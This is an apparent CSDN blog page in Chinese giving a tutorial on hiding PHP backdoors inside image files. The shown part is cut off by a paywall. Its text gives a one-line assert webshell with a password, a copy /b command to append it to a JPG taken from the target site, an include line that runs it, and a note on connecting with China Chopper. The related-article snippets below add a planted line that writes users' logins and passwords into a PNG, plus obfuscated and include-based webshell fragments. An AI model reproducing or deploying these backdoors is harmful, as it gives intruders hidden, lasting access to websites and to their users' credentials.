PHP图片后门藏匿攻略

最新推荐文章于 2024-07-10 07:05:01 发布
最新推荐文章于 2024-07-10 07:05:01 发布
阅读量1.8k 收藏 9
点赞数
分类专栏: PHP 逆向漏洞 实战篇 文章标签: PHP图片后门 一句话图片 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/93206624
版权
本文介绍了PHP图片后门的初级、中级和高级藏匿方法,包括通过合并PHP与图片、利用远程文件包含和修改EXIF信息实现后门隐藏。还提到了工具PowerExif用于修改EXIF信息,并分析了采用高级方法的原因。
摘要由CSDN通过智能技术生成

在这里插入图片描述
我们平时藏匿图片后门是什么流程呢?我们来看一下

0x01 初级的藏匿方法:

1、建立一个eval.php文件,上面加入我们的后门:

<?php assert($_POST[feiji]);?>

2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。

3、合并图片和php后门:

Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg

4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:

<?php include (‘2.jpg’); ?>

5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。

访问图片正常:
在这里插入图片描述
访问i

最低0.47元/天 解锁文章
Coisini、
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
隐藏图片后门
wodafa的博客
03-20 1342
一、前言 本文原创作者:sucppVK,本文属i春秋原创奖励计划,未经许可禁止转载! 先说明三点:   这个后门就是一句话木马这个不同于我们常说的图片马这个后门是过安全狗的 这个不算什么新姿势,只不过被提到的次数比较少 (各大论坛常见的,无非编码、解码、分割等,本文不属于以上几种) 而且咱们i春秋论坛没有相关资料,小弟就来抛砖引玉了。 学习本教程应具备的
php后门URL的防范
10-26
PHP编程中,后门URL是一个严重的安全问题,它允许未经授权的用户通过URL直接访问原本应受到保护的资源。这通常发生在开发过程中,由于配置不当或疏忽,使得原本不应暴露的文件可以直接被浏览器访问。在给定的描述...
一种隐藏在JPG图片EXIF中的后门
代码析构师的专栏
05-09 956
几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。 技术细节 这个后门可分为两部
PHP设置后门保护代码的亲身经历
最新发布
Li91314的博客
07-10 155
只有这样,我们才能确保自己的网站在日益复杂的网络环境中安全、稳定地运行。那天,我收到了一封来自服务器的警报邮件,说网站可能存在安全风险。这让我意识到,我的网站可能存在后门,被攻击者利用。通过这些措施的实施,我成功地保护了我的网站免受恶意攻击。只有不断学习、不断实践、不断完善自己的安全措施,才能确保网站的安全和稳定。但在这个过程中,我意识到,仅仅关闭后门是不够的,更重要的是要预防类似的事情再次发生。直到有一次,我负责维护的一个小型网站遭遇了恶意攻击,我才深刻意识到保护代码的重要性。
php图片大马加后门,一次对php大马的后门的简单分析
weixin_30923925的博客
03-12 579
一次对php大马的后门的简单分析有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 766
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码面是否包含后门代码,面附详细的使用说明
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
Php后门php 后门
06-25
php 后门
PHP include任意文件或URL介绍
10-26
include和require的用途是包含并运行指定的文件。在官方手册没有说明被包含的文件类型,那么PHP到底能不能include一个非PHP文件呢?
php同步 图片回显,php后门插在图片执行回显思路
weixin_35450193的博客
03-10 140
作者:lcx有的网站不检查后缀格式,但检查文件头很严格,gif89a根本骗不过去,只能copy/b 1.gif+1.php 2.php这样.但一句话php木马或inulcde之类的就不会有回显了.而且把php代码插在图片,如果不知那个网站目录有写权限的话,也很难写文件上去.当然用NC抓包提交可以看到回显,但是太罗嗦了.下边的代码只能算个poc了.php:COMMANDE PHP :(pas de...
PHP把账号密码放在图片上的后门操作手法
精哥哥
11-17 275
$rty=$username.'=='.$password.','; @file_put_contents('./com/img/wx.png',$rty,FILE_APPEND); 上面是一段把 用户名密码 附加在一个图片上 在使用某个开源项目试,git发现,一个png文件老是被改 就一个小图标文件,按理说,不会有修改的 然后全局查找,果然,找到一个后门 如上所示。 这样后门放置者,很容易得到你网站的用户名密码,轻松进后台 ...
PHP后门隐藏
lok3166的专栏
04-29 1214
首先建立一PHP文件test.php 文件内容为:    $test=$_GET[test];  @include test/.$test;  ?>     Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件。然后访问 http://localhost/test/test.php?test
一款php后门 phpspy的情况
可爱是名词吗?
10-29 4262
关于phpspy这款php后门可以查看! 很多人也许因为没有使用过,所以不知道作用,我详细的说明一下! 把几个功能解释下,首先从原先版本就有的开始说!! ************************************************************ 1 设置部分..... 首先,用记事本打开下载完毕的phpspy.php会看到相关设置,按着注释修改就可以了,admin[
php include 图片,文章自定义调用图片(include自带插件版本)
weixin_42394780的博客
03-23 350
打开include.php。输入以下代码:RegisterPlugin("default","ActivePlugin_default"); //本页面所有default为主题目录名,请根据自己的实际情况进行更改function ActivePlugin_default() {Add_Filter_Plugin('Filter_Plugin_Edit_Response5','default_F...
PHP安全编程:留心后门URL
come_on_air的专栏
06-16 548
后门URL是指虽然无需直接调用的资源能直接通过URL访问。例如,下面WEB应用可能向登入用户显示敏感信息: [php] view plaincopy    $authenticated = FALSE;   $authenticated = check_auth();      /* ... */      if ($authenticated)
php include 图片,set_include_path 时,include.php包含路径有错误,点击include.php 浏览是一张破裂的图片这是怎么回事?...
weixin_30719609的博客
03-23 85
header("content-type:text/html;charset=utf-8");// date_default_timezone_set("PRC");define("ROOT",dirname(__FILE__));set_include_path(".".PATH_SEPARATOR.ROOT."/lib".PATH_SEPARATOR.ROOT."/core".PATH_SEP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值